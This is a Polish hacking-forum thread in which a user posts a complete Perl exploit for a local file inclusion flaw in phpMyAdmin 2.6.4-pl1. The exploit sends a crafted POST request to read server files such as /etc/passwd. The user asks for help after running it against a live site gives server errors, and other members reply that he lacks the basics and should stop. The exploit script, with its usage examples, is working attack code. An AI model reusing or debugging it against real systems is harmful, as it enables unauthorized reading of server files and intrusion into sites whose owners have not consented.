Pokaż wyniki 1 do 5 z 5

Temat: phpMyAdmin 2.10.3 - nowy

  1. #1
    Zarejestrowany
    Jul 2009
    Postów
    18

    Domyślnie phpMyAdmin 2.10.3 - nowy

    Przepraszam ze zakladam nowy temat ale coś zacząłem rozumieć

    Mam exploit
    Kod php:
    #!/usr/bin/perl
    use IO::Socket;

    # SecurityReason.com TEAM
    # Maksymilian Arciemowicz ( cXIb8O3 ) [email protected]
    #
    # Local file inclusion (./$FILE)
    # simple exploit phpMyAdmin 2.6.4-pl1
    #
    #
    # SecurityReason.com

    if (@ARGV 3)
    {
    print 
    "\r\n SecurityReason TEAM\r\n";
    print 
    "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
    print 
    " \r\n";
    print 
    "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
    print 
    "HOST - Host where is phpmyadmin example: http://localhost\r\n";
    print 
    "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
    print 
    "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
    print 
    "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
    exit();
    }

    $HOST $ARGV[0];
    $DIR $ARGV[1]."libraries/grab_globals.lib.php";
    $FILE "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
    $LENGTH length $FILE;

    print 
    "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
    $HOST =~ s/(http:\/\/)//;

    $get1 IO::Socket::INET->newProto => "tcp"PeerAddr => "$HOST"PeerPort => "80") || die "Error 404\r\n\r\n";

    print 
    $get1 "POST ".$DIR." HTTP/1.0\n";
    print 
    $get1 "Host: ".$HOST."\n";
    print 
    $get1 "Content-Type: application/x-www-form-urlencoded\n";
    print 
    $get1 "Content-Length: ".$LENGTH."\n\n";

    print 
    $get1 $FILE;

    while (
    $odp = <$get1>)
    {
    if (
    $odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2in <b>/ ) {
    printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
    exit;
    }

    printf $odp;
    }

    # milw0rm.com [2005-10-10] 
    ale jak go wykonuje to mam Error 500

    http://adresstrony.pl /phpmyadmin/ /../../../../../etc/passwd
    albo mam jakis blad z tym plikiem libraries/grab_globals.lib.php Call to Undefined fuction PMA_getenv <> in libraries/grab_globals.lib.php on line 113
    Pomóżcie
    Ostatnio edytowane przez mikipl : 07-21-2009 - 11:53

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Do dokumentacji/google/wikipedii zobaczyc co to jest Error 500 w przypadku serwera WWW to bedziesz rozumial.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3
    Zarejestrowany
    Jul 2009
    Postów
    18

    Domyślnie

    ok ale też mi wyskakuje drugi błąd
    z plikiem libraries/grab_globals.lib.php Call to Undefined fuction PMA_getenv <> in libraries/grab_globals.lib.php on line 113

  4. #4
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    nie znasz podstaw podstaw a probujesz exploitow!
    War, war never changes.

  5. #5
    Zarejestrowany
    Jul 2009
    Postów
    10

    Domyślnie

    Daj sobie z tym spokój. Przynajmniej teraz.
    Dlaczego? Nie słuchasz rad. Dlaczego nie teraz? Ewidentne zafascynowanie włamywaniem, hackiem itd. Przejdzie Poczytaj o hakerach, za miesiąc lub dwa (lub więcej) wróć, zacznij się uczyć podstaw.
    Przepraszam, że się powtarzam:

    Musisz sam do tego dojść (bedzie lepiej dla Ciebie i dla nas).
    Nie zrozumiesz za pierwszym razem? Zrozumiesz za następnym razem...
    Naucz się php i zasady działania tego wszystkiego. Dasz sobie radę.

    aaa właśnie, jeśli jesteś początkujący to zastosuj się do jednej z moich ulubionych sentencji (Św. Izydor):
    "Na początku słuchaj. Zabieraj głos jako ostatni. Ostatnie słowo jest więcej warte niż pierwsze."
    Chyba, że masz pytania. Najpierw pytaj google. Potem jeśli masz dobrych kolegów informatyków, pytaj ich. Potem pytaj na forum.
    Chcesz wejść na szczyt drabiny omijając pierwsze szczebelki? Powodzenia.
    Na początku słuchaj. Zabieraj głos jako ostatni. Ostatnie słowo jest więcej warte niż pierwsze.

Podobne wątki

  1. phpMyAdmin 2.10.3
    By mikipl in forum Hacking
    Odpowiedzi: 8
    Autor: 07-20-2009, 19:25
  2. Nowy.
    By Asphera in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 06-19-2009, 10:55
  3. Odpowiedzi: 5
    Autor: 05-13-2009, 17:32
  4. Sql injection PHPMYADMIN
    By teju14 in forum Inne metody
    Odpowiedzi: 11
    Autor: 03-16-2009, 18:28
  5. shell przez phpmyadmin
    By adex in forum Hacking
    Odpowiedzi: 13
    Autor: 01-27-2009, 13:53

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj